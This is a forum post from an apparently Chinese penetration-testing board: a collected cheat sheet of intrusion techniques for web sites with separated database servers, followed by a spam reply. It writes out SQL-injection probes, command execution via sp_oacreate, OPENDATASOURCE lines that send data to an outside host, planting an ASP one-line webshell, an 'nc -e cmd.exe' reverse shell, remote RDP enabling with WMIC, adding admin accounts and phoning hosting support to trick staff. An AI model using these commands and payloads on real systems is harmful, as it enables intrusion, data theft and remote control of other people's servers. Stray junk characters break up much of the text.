找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 站库分离的方法
返回列表 发新帖
查看: 3909|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
  r! ^8 A; I$ M% s& y$ w# o2 Y' O/ {3 t$ M5 g* ]- D  r% Y

) _# H! i  n' a( K4 J; ~; ?SA点数据库分离搞法+语句:1 X6 L5 k4 q) a( v; {

6 G" K& z7 c/ ^( g. k8 a注射点不显错,执行下面三条语句页面都返回正常。5 |4 P7 e4 `" y9 R4 A
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')% r3 G8 A- U/ e( \& u
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
* [$ A  g0 g; H& N' rand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')  N6 F- ^6 q+ y9 ^
可以列目录,判断系统为2000,web与数据库分离2 H) G  }1 Z5 o2 ?
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。, f1 N) V8 q; i& V8 a& r/ b
在注射点上执行8 b, ?5 R8 T4 V0 S  r* m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
# B3 _" M& N! b  o4 [: z页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP9 k5 Z) R( J4 z" t8 O
还有我用NC监听得其他端口都没有得到IP。
/ K: f8 P) {- x6 y. @) d) q8 z% Q6 E% B
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。2 e8 n# }4 T6 h( v+ Y8 R2 ?
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
7 G3 q7 x0 C3 Y5 O+ f4 V8 _
; n, C3 G" L% P5 q! A. \: D& g9 R* A;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
& T0 E! |1 T  h3 f1 D& h  X; z0 u3 L. O4 x
现在就猜想是不是数据库是内网而且不能连外网。
% A8 p( P  @% C6 h% X) T8 [; ]' [" f) e6 e( o! F5 _
4 m) D' J3 W  Y* f
access导出txt文本代码, ~) a$ C. b1 M# L7 ?8 W7 p
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin! V: I* ~, B$ o5 k( G
! t9 g4 }  n: \1 L5 p& ?' b
% x: j# P4 ?  l
8 \; e' T! ?) ~% T0 l- b- ]
自动跳转到指定网站代码头7 ]& R7 N2 s5 d* [' Q# s0 V, f
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
" L" B! B' W0 Y! m- V8 ?1 S
4 C6 \  H" _! f+ l
6 F, [+ p$ z" K" E. f3 D/ w入侵java or jsp站点时默认配置文件路径:6 \9 B) y/ U$ t% q+ ~+ ?+ y+ I
\web-inf\web.xml
7 F; i  H; L; t: `; X9 Ztomcat下的配置文件位置:
; `4 A* G. c2 Q* o0 h\conf\server.xml            (前面加上tomcat路径)0 G( {; `0 x) ?, k6 K5 L0 Z, @
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
  {% |: \6 I: A% X  D* \9 U! O8 |1 e4 g- v1 R
% _7 C/ P! P$ ~1 l7 f

9 k! ^" D/ I4 F8 Z/ C/ C( F$ c  ]检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
/ W9 N4 A# k9 Q' Y: X7 Y-1%23
( t+ U" h9 X1 Q" F8 s  i9 [; ^>
( R6 y8 o  \8 t' H<
0 e5 i9 W+ r; _1'+or+'1'='1
0 y7 b# Y0 y# o+ F1 b( pid=8%bf
/ `. _8 g( \0 w0 J, T# B9 y) |# p  V2 k' Q
全新注入点检测试法:
7 ?: l: T3 G) d3 Y: D1 j在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
' l5 P" i) Y2 I; U. \$ F
1 T+ c; x% c: L6 ]( }在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。  L5 O% @: d9 n2 ~

; s$ a4 n, L% d- j6 ^0 S/ U搜索型注入判断方法:
" A6 ?. h! v+ h北京%' and '1'='1' and '%'='
$ ]: W/ }% ^$ v' J% J# v北京%' and '1'='2' and '%'='" u- J) g: R9 V! F* g, Y! F" `4 H

5 A- m6 g4 U6 o# R/ Z$ X; u5 e
! k8 |* x$ b0 t% b. @COOKIES注入:
, L# s8 F" r! S2 l, t6 I1 [6 D/ N& Y" _+ e  j
javascript:alert(document.cookie="id="+escape("51 and 1=1"));9 O/ K/ P  F% ^

* d0 [9 U: E. a, T2000专业版查看本地登录用户命令:- c  F& A$ w& ]1 U- J. e1 Y! J5 i% Y
net config workstation
7 @0 S8 O+ q7 [+ w; z
" I. }  i; D3 C, m# `& O# R
2 D! t3 \6 a  o1 ~' d. h2003下查看ipsec配置和默认防火墙配置命令:4 E: F( S3 q( A/ b& j( |  g
netsh firewall show config
! [3 w- c6 V. G* unetsh ipsec static show all
5 \* f. n, D/ ~/ {' L$ u2 k" b/ Q9 L( G" R, M/ l& L
不指派指定策略命令:
2 V2 W5 ^$ j3 P; e( ]0 t& u* {netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
$ S1 p+ b5 }1 Unetsh ipsec static show policy all  显示策略名; F' g# G6 p* u( j# i
$ t5 b/ g, W6 n

) U% F( Q( s' K4 F4 B猜管理员后台小技巧:  k  w/ j0 E1 ]8 M; G
admin/left.asp : @5 l2 C/ H% D: M& P
admin/main.asp
. {& Y, B% \4 b: n) Kadmin/top.asp( S. x& n/ v) X3 a8 N# e1 {
admin/admin.asp
8 C3 j8 P( R* _% j会现出菜单导航,然后迅雷下载全部链接7 D) m  E) [3 e3 }

- t- F& c) ~+ C7 b" i+ E+ ^1 M' n2 q! P, X6 G' Y  \" v
社会工程学:, L9 m( w& m4 `. c& ~) Q; H6 o4 U
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人  x! S3 G  L) G  W3 C( Q
然后去骗客服3 g( C3 E& t! p5 l. Y; s/ \% F

$ e7 o  r+ n1 E" I. ^- ^
9 Z4 n/ N+ x+ C3 r# m. H9 o4 l统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
4 {0 @0 a& M% _: m: \9 y9 @查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, : F+ I8 W$ t3 @1 _9 r
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。* S" `# N2 l( g) Z$ k: e
" w# K5 V5 e5 ?# r
) R7 \. f- \/ w4 a) b

) e% P7 ~3 P/ b! U. g: |6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
. z& U* p4 l+ S) X" t# n; Q% L. J' Y

0 o# G- G; j( l9 R, v8 }
$ j; k4 M4 V9 u- QCMD加密注册表位置3 a4 U" X, v- @4 \# ]
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
3 s2 q/ o& M& D( {4 pAutoRun2 d8 @4 o1 A* t0 a

* q! y+ o: O+ g: ?' V(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor0 r( k  n) ^. P1 ^: r! g
AutoRun6 ]  ~( p3 k8 @+ n5 e4 }4 {

' {( e0 B0 Q1 O8 s; ~$ i4 j) A) ]+ |1 j9 w' K5 S
在找注入时搜索Hidden,把他改成test* d8 m+ H( d6 u" U$ W, r5 r8 t3 l

6 L- L% |; y1 ?% M9 C
4 a) z/ P8 L. y3 t  L
  X8 s0 @5 q2 l' _" Amstsc /v:IP /console
5 p; X) o- }0 t: A, K  |$ P) ]" s/ u% E* B2 p( t
$ u+ i4 m  O( ?) N4 o% B" L2 `
一句话开3389:) @. G# j6 [8 ]& P' F
& y+ c: ?2 f( a, Z% W
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  + X$ P: Z& q; x2 P7 E5 J
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
/ n, R% g& V) K* K. M" |
6 J; m8 e: J. B# F( n/ N& s3 e  p
! K' q7 ^. m( S, m/ c知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:5 E$ B, o+ t2 W6 D' l9 n7 o
Insert into admin(user,pwd) values('test','test')
& z1 X, \4 a' p( w+ {  P& \' E) l! C# ^+ _" y
0 {5 }* O0 i5 K, L# h% \% @
NC反弹- e& V6 t( o: g; j
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
. P: `' ~& D1 I/ H" K. Y) o+ A+ r, _: H然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)3 s, c& D2 P% i
+ W, q- |2 N# Z% N, p, i" b: f

$ |" M4 i% `' \& n+ F7 X/ Y在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
8 p8 t+ `# e" D" e& h; k" q9 R
# N' M$ I( l( Y  T* z/ c有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录' q. `! X) }$ }. I, p$ B
例如:
* y3 l! A$ g( y1 t$ usubst k: d:\www\ 用d盘www目录替代k盘5 _- D2 g# _+ R; C, P! l4 @
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表